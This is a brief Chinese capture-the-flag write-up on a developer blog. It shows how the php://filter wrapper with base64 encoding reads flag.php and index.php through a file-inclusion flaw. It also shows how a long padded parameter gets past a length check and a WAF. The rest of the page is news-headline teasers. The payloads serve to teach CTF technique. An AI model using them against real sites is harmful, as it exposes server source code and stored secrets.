php伪协议

flag=php://filter/read=convert.base64-encode/resource=flag.php

 

有waf,尝试着查看index.php可以正常返回加密的base64,解码后得源码

 简单分析,需要满足传入有flag并且传入的字符数要>800才会满足包含条件

 payload:

0=0*1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&flag=php://filter/read=convert.base64-encode/resource=index.php

 得到后解码

 

# php
Logo
深圳城市开发者社区

一座年轻的奋斗人之城,一个温馨的开发者之家。在这里,代码改变人生,开发创造未来!

更多推荐

cover

王腾:小米手机用户忠诚度安卓第一;谷歌2023年裁员逾1.2万,遣散费高达21亿美元;库克预告iOS 18重磅更新 | 极客头条

avatar 深圳城市开发者社区
cover

雷军、李想、何小鹏谈苹果放弃造车;字节跳动正秘密研发多个AI产品;微软GitHub Copilot企业版正式上线 | 极客头条

avatar 深圳城市开发者社区

马斯克今年财富缩水240多亿美元;香港最大AI诈骗案:AI变脸冒充CFO,骗走2亿港元 | 极客头条...

「极客头条」—— 技术人员的新闻圈!CSDN 的读者朋友们早上好哇,「极客头条」来啦,快来看今天都有哪些值得我们技术人关注的重要新闻吧。整理 | 郑丽媛出品 | CSDN(ID:CSDNnews)一分钟速览新闻点!香港最大AI诈骗案:Deepfake换脸“英国CFO”,骗走公司2亿港币阿里大模型“通义千问”推出春节新功能:生成全家福写真华为全年研发投入1621亿元,中国第一,世界第五哲库解散后,芯

avatar 深圳城市开发者社区